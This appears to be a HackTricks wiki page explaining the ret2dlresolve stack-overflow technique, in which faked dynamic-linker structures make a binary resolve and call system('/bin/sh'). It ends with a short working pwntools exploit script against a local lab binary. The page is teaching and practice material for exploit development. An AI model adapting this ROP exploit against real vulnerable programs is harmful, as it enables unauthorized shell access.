hacktricks/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md
Carlos Polop cfff5cc9a8 re
2024-12-14 12:46:15 +01:00

5.3 KiB

Ret2dlresolve

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Basic Information

As explained in the page about GOT/PLT and Relro, binaries without Full Relro will resolve symbols (like addresses to external libraries) the first time they are used. This resolution occurs calling the function _dl_runtime_resolve.

The _dl_runtime_resolve function takes from the stack references to some structures it needs in order to resolve the specified symbol.

Therefore, it's possible to fake all these structures to make the dynamic linked resolving the requested symbol (like system function) and call it with a configured parameter (e.g. system('/bin/sh')).

Usually, all these structures are faked by making an initial ROP chain that calls read over a writable memory, then the structures and the string '/bin/sh' are passed so they are stored by read in a known location, and then the ROP chain continues by calling _dl_runtime_resolve with the address to $'/bin/sh'.

{% hint style="success" %} This technique is useful specially if there aren't syscall gadgets (to use techniques such as ret2syscall or SROP) and there are't ways to leak libc addresses. {% endhint %}

You can find a better explanation about this technique in the second half of the video:

{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}

Structures

It's necessary to fake 3 structures: JMPREL, STRTAB and SYMTAB. You have a better explanation about how these are built in https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures

Attack Summary

  1. Write fake estructures in some place
  2. Set the first argument of system ($rdi = &'/bin/sh')
  3. Set on the stack the addresses to the structures to call _dl_runtime_resolve
  4. Call _dl_runtime_resolve
  5. system will be resolved and called with '/bin/sh' as argument

Example

You can find an example of this technique here containing a very good explanation of the final ROP chain, but here is the final exploit used:

from pwn import *

elf = context.binary = ELF('./vuln', checksec=False)
p = elf.process()
rop = ROP(elf)

# create the dlresolve object
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh'])

rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fake structures
rop.ret2dlresolve(dlresolve)     # call .plt and dl-resolve() with the correct, calculated reloc_offset

log.info(rop.dump())

p.sendline(rop.chain())
p.sendline(dlresolve.payload)    # now the read is called and we pass all the relevant structures in

p.interactive()

References

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}